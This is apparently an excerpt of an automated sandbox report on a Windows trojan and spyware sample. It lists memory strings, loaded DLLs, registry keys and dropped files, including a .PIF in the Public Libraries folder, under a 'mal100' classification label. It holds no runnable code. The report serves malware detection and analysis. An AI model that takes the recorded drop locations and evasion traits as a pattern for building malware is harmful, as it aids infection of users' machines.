                        Source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerpcrt4.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecryptbase.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecurity.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCFGMGR32.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesppcext.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLE32.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefilterLib.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePROFAPI.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -%system32%%systemroot%\system32%sysnative%%windir%%programfilesnative%%systemdrive%\Program FilesCommonFilesDirCommonProgramFilesCommonFilesDir (x86)CommonProgramFiles(x86)ProgramFilesDirProgramFilesProgramFilesDir (x86)ProgramFiles(x86)ProgramDataPublicWIN16WIN32DOSUNKNOWNProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright\StringFileInfo\000004B0\\StringFileInfo\000004E4\\StringFileInfo\040904B0\\StringFileInfo\040904E4\__PROCESS_HISTORYDATABASELIBRARYINEXCLUDESHIMPATCHAPPEXEEXE_TYPEMATCHING_FILESHIM_REFPATCH_REFLAYERFILEAPPHELPLINKDATAMSI_TRANSFORMMSI_TRANSFORM_REFMSI_PACKAGEFLAGCONTEXTMSI_CUSTOM_ACTIONFLAG_REFCONTEXT_REFACTIONLOOKUPNAMEDESCRIPTIONMODULEAPIVENDORAPP_NAMECOMMAND_LINEDLLFILEWILDCARD_NAMEAPPHELP_DETAILSLINK_URLLINK_TEXTAPPHELP_TITLEAPPHELP_CONTACTSXS_MANIFESTDATA_STRINGMSI_TRANSFORM_FILELAYER_DISPLAYNAMECOMPILER_VERSIONACTION_TYPESTRINGTABLEOFFSETSHIM_TAGIDPATCH_TAGIDPREVOSMAJORVERPREVOSMINORVERPREVOSPLATFORMIDPREVOSBUILDNOPROBLEMSEVERITYLANGIDENGINEHTMLHELPIDINDEX_FLAGSFLAGSDATA_VALUETYPEDATA_DWORDLAYER_TAGIDMSI_TRANSFORM_TAGIDFROM_LINK_DATEUPTO_LINK_DATEFLAG_TAGIDCONTEXT_TAGIDRUNTIME_PLATFORMGUEST_TARGET_PLATFORMURLURL_IDAPP_NAME_RC_IDVENDOR_NAME_RC_IDSUMMARY_MSG_RC_IDDESCRIPTION_RC_IDPARAMETER1_RC_IDTAGIDSTRINGTABLE_ITEMINCLUDEGENERALMATCH_LOGIC_NOTAPPLY_ALL_SHIMSUSE_SERVICE_PACK_FILESMITIGATION_OSMONITORING_OFFTELEMETRY_OFFRAC_EVENT_OFFSHIM_ENGINE_OFFLAYER_PROPAGATION_OFFBLOCK_UPGRADEBLOCK_UPGRADE_TYPEREINSTALL_UPGRADEREINSTALL_UPGRADE_TYPEINCLUDEEXCLUDEDLLTIMEMODTIMEFLAG_MASK_KERNELFROM_BIN_PRODUCT_VERSIONUPTO_BIN_PRODUCT_VERSIONDATA_QWORDFLAG_MASK_USERFLAGS_NTVDM1FLAGS_NTVDM2FLAGS_NTVDM3FLAG_MASK_SHELLFLAG_MASK_WINRTFROM_BIN_FILE_VERSIONUPTO_BIN_FILE_VERSIONFLAG_MASK_FUSIONFLAG_PROCESSPARAMFLAG_LUAFLAG_INSTALLPATCH_BITSFILE_BITSEXE_IDDATA_BITSMSI_PACKAGE_IDDATABASE_IDINDEX_BITSINDEXESINDEXMATCH_MODETAGINDEX_TAGINDEX_KEYCONTEXT_PLATFORM_IDCONTEXT_BRANCH_IDFIX_IDAPP_IDKDEVICEKDRIVERMATCHING_DEVICEACPIBIOSCPUOEMKFLAGKFLAG_REFKDATAKSHIMKSHIM_REFVENDOR_IDDEVICE_IDSUB_VENDOR_IDSUB_SYSTEM_IDREVISION_EQREVISION_LEREVISION_GEDATE_EQDATE_LEDATE_GECPU_MODEL_EQCPU_MODEL_LECPU_MODEL_GECPU_FAMILY_EQCPU_FAMILY_LECPU_FAMILY_GECREATOR_REVISION_EQCREATOR_REVISION_LECREATOR_REVISION_GEFORCE_CACHETRACE_PCAPACKAGEID_NAMEPACKAGEID_PUBLISHERPACKAGEID_ARCHITECTUREPACKAGEID_LANGUAGEPACKAGEID_VERSIONFROM_PACKAGEID_VERSIONUPTO_PACKAGEID_VERSIONOSMAXVERSIONTESTEDFROM_OSMAXVERSIONTESTEDUPTO_OSMAXVERSIONTESTEDROUTING_MODEOS_VERSION_VALUEQUIRKQUIRK_TAGIDQUIRK_REFQUIRK_ENABLED_VERSION_LTQUIRK_COMPONENT_CODE_IDQUIRK_CODE_IDQUIRK_OFFELEVATED_PROP_OFFMIGRATION_DATAMIGRATION_DATA_TYPEMIGRATION_DATA_REFMIGRATION_DATA_TEXTMIGRATION_DATA_TAGIDBIOS_BLOCKMATCHING_INFO_BLOCKDEVICE_BLOCKUPGRADE_DRIVER_BLOCKMANUFACTURERMODELDATEUPGRADE_DATAMATCHING_REGREG_VALUE_NAMEREG_VALUE_TYPEREG_VALUE_DATA_SZREG_VALUE_DATA_DWORDREG_VALUE_DATA_QWORDREG_VALUE_DATA_BINARYMATCHING_TEXTTEXTTEXT_ENCODINGMACHINE_BLOCKSHIM_CLASSOS_UPGRADEPACKAGEE
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameApphelpj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.422250057.0000000002F44000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/MediaIsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodingInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation| vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.422202761.0000000002F7F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCFGMGR32.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecryptbase.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecurity.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesechost.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.398684375.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefilterLib.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.398684375.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePROFAPI.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVERSION.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebcryptprimitives.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.422437505.0000000004E50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCLBCATQ.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.471479679.000000001002F000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameLanguagePack vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.422677307.0000000004E68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.422159926.0000000002F7F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUxTheme.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ItemHeightFirstItemOffsetSeparatorHeightTopIndexCircularSystem.Link.TargetUrlHostNameSystem.Link.TargetUrlSystem.Link.TargetUrlPathSystem.Link.DateVisitedSystem.History.SelectionCountSystem.RecordedTV.ProgramDescriptionSystem.Search.RankSystem.Link.TargetParsingPathSystem.History.TargetUrlHostNameSystem.History.VisitCountSystem.TitleSystem.AcquisitionIDSystem.Contact.WebPageSystem.ContentStatusSystem.RecordedTV.ChannelNumberSystem.ItemUrlSystem.ItemPathDisplaySystem.OriginalFileNameSystem.Media.UserWebUrlSystem.ItemFolderPathDisplaySystem.SubjectSystem.AuthorSystem.FileNameSystem.CategorySystem.SourceItemSystem.ItemNameDisplaySystem.ContentTypeSystem.DateCreatedSystem.DateModifiedSystem.Document.WordCountSystem.ItemFolderNameDisplaySystem.Link.FeedItemLocalIdSystem.Document.PageCountSmallIconsLockIconSizeNoToolbarCustomizeNoBandCustomizeBtn_SearchBtn_HistoryBtn_RefreshBtn_HomeBtn_ForwardBtn_StopSpecifyDefaultButtonsBtn_BackBtn_PrintBtn_EditBtn_MailNewsBtn_SizeBtn_FullscreenBtn_ToolsBtn_FavoritesBtn_FoldersNoInstrumentationNoWindowsUpdateBtn_EncodingBtn_PrintPreviewBtn_CopyBtn_PasteBtn_DiscussionsBtn_CutNoFileUrlNoChannelUIBtn_PageBtn_HelpBtn_PanningBtn_FeedsNoExpandedNewMenuBtn_MediaNoChannelLoggingNoManualUpdatesNoEditingSubscriptionsNoRemovingSubscriptionsNoRemovingChannelsNoAddingSubscriptionsNoAddingChannelsNoEditingChannelsMaxSubscriptionSizeMaxChannelCountNoEditingScheduleGroupsMaxChannelSizeNoChannelContentNoSubscriptionContentNoScheduledUpdatesNoUnattendedDialingMaxChannelLevelsNoSubscriptionPasswordsUpdateInNewProcessMaxWebcrawlLevelsUpdateExcludeBeginUpdateExcludeEndMaxSubscriptionCountMinUpdateIntervalUsePolicySearchProvidersOnlyNoFileOpenNoChangeDefaultSearchProviderAddPolicySearchProvidersNoSplashNoSearchBoxNoBrowserSaveWebCompleteNoSearchCustomizationNoBrowserCloseNoOpeninNewWndNoSelectDownloadDirNoBrowserContextMenuNoBrowserOptionsNoFavoritesNoFileNewNoBrowserSaveAsNoHelpItemTutorialNoHelpItemSendFeedbackNoToolbarOptionsAlwaysPromptWhenDownloadNoViewSourceRestGoMenuNoTheaterModeNoFindFilesNoPrintingNo_LaunchMediaBarNoAddressBarNoLinksBarNoBrowserBarsNoToolBarNoNavButtonsNoHelpMenuNoDefaultTextSizeNoExtensionManagementNoPopupManagementNo_MediaBarOnlineContentNoCrashDetectionRestrictionsRestrictionsToolbars\RestrictionsExplorer2\ vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.422595078.0000000004E68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefilterLib.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePOWRPROF.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.390382927.0000000003B50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.422700357.0000000004E68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.384822240.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLanguagePack vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.384822240.0000000002B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamews2_32.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefastprox.dllj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.421759155.0000000002F47000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIeRtUtil.dllD vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 0vJrK0NCd1.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs 0vJrK0NCd1.exe
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Users\Public\Libraries\Elpuxpki.PIFJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@42/20@5/3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Program Files\Common Files\System\symsrv.dllJump to behavior
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ori.nznet.nzorg.nzparliament.nzschool.nzco.omcom.omedu.omgov.ommed.ommuseum.omnet.omorg.ompro.omac.pagob.pacom.paorg.pasld.paedu.panet.paing.paabo.pamed.panom.paedu.pegob.penom.pemil.peorg.pecom.penet.pecom.pforg.pfedu.pfcom.phnet.phorg.phgov.phedu.phngo.phmil.phi.phcom.pknet.pkedu.pkorg.pkfam.pkbiz.pkweb.pkgov.pkgob.pkgok.pkgon.pkgop.pkgos.pkinfo.pkcom.plnet.plorg.plaid.plagro.platm.plauto.plbiz.pledu.plgmina.plgsm.plinfo.plmail.plmiasta.plmedia.plmil.plnieruchomosci.plnom.plpc.plpowiat.plpriv.plrealestate.plrel.plsex.plshop.plsklep.plsos.plszkola.pltargi.pltm.pltourism.pltravel.plturystyka.plgov.plap.gov.plic.gov.plis.gov.plus.gov.plkmpsp.gov.plkppsp.gov.plkwpsp.gov.plpsp.gov.plwskr.gov.plkwp.gov.plmw.gov.plug.gov.plum.gov.plumig.gov.plugim.gov.plupow.gov.pluw.gov.plstarostwo.gov.plpa.gov.plpo.gov.plpsse.gov.plpup.gov.plrzgw.gov.plsa.gov.plso.gov.plsr.gov.plwsa.gov.plsko.gov.pluzs.gov.plwiih.gov.plwinb.gov.plpinb.gov.plwios.gov.plwitd.gov.plwzmiuw.gov.plpiw.gov.plwiw.gov.plgriw.gov.plwif.gov.ploum.gov.plsdn.gov.plzp.gov.pluppo.gov.plmup.gov.plwuoz.gov.plkonsulat.gov.ploirm.gov.plaugustow.plbabia-gora.plbedzin.plbeskidy.plbialowieza.plbialystok.plbielawa.plbieszczady.plboleslawiec.plbydgoszcz.plbytom.plcieszyn.plczeladz.plczest.pldlugoleka.plelblag.plelk.plglogow.plgniezno.plgorlice.plgrajewo.plilawa.pljaworzno.pljelenia-gora.pljgora.plkalisz.plkazimierz-dolny.plkarpacz.plkartuzy.plkaszuby.plkatowice.plkepno.plketrzyn.plklodzko.plkobierzyce.plkolobrzeg.plkonin.plkonskowola.plkutno.pllapy.pllebork.pllegnica.pllezajsk.pllimanowa.pllomza.pllowicz.pllubin.pllukow.plmalbork.plmalopolska.plmazowsze.plmazury.plmielec.plmielno.plmragowo.plnaklo.plnowaruda.plnysa.plolawa.plolecko.plolkusz.plolsztyn.plopoczno.plopole.plostroda.plostroleka.plostrowiec.plostrowwlkp.plpila.plpisz.plpodhale.plpodlasie.plpolkowice.plpomorze.plpomorskie.plprochowice.plpruszkow.plprzeworsk.plpulawy.plradom.plrawa-maz.plrybnik.plrzeszow.plsanok.plsejny.plslask.plslupsk.plsosnowiec.plstalowa-wola.plskoczow.plstarachowice.plstargard.plsuwalki.plswidnica.plswiebodzin.plswinoujscie.plszczecin.plszczytno.pltarnobrzeg.pltgory.plturek.pltychy.plustka.plwalbrzych.plwarmia.plwarszawa.plwaw.plwegrow.plwielun.plwlocl.plwloclawek.plwodzislaw.plwolomin.plwroclaw.plzachpomor.plzagan.plzarow.plzgora.plzgorzelec.p